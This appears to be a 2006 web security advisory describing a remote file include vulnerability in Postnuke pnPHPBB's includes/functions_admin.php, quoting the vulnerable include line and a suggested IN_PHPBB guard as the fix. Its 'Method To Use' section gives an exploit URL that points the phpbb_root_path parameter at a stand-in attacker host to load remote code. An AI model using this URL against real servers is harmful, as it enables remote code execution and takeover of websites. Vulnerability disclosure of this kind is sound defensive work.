Spamalertz.com - Postnuke pnPHPBB remote file include vulnerability

Postnuke pnPHPBB remote file include vulnerability

Saturday, 23 September 2006

phpBB can be exploited by a vulnerability in functions_admin.php file

Vulnerable File: includes/functions_admin.php

Vulnerable Code:


//The phpbb_root_path isn't initialize

include_once( $phpbb_root_path . 'includes/functions.' . $phpEx );

Method To Use:


http://www.victim.com/[pn_phpbb]/includes/

functions_admin.php?phpbb_root_path=http://evilsite.com/evilcommandtext.txt?





<br /><br />



How To Fix:

<br />

Add this code before the include

<br /><br />

{moscode}if ( !defined('IN_PHPBB') )

{

die("Hacking attempt");

}

Intensity:Critical

< Prev		Next >

[ Back ]

Main Menu

Affiliates

Online Store Free Ringtones Seo Directory IWebListin Jobs in India Freshers Jobs listings. Winkeyfinder

Ads

Main Menu

Affiliates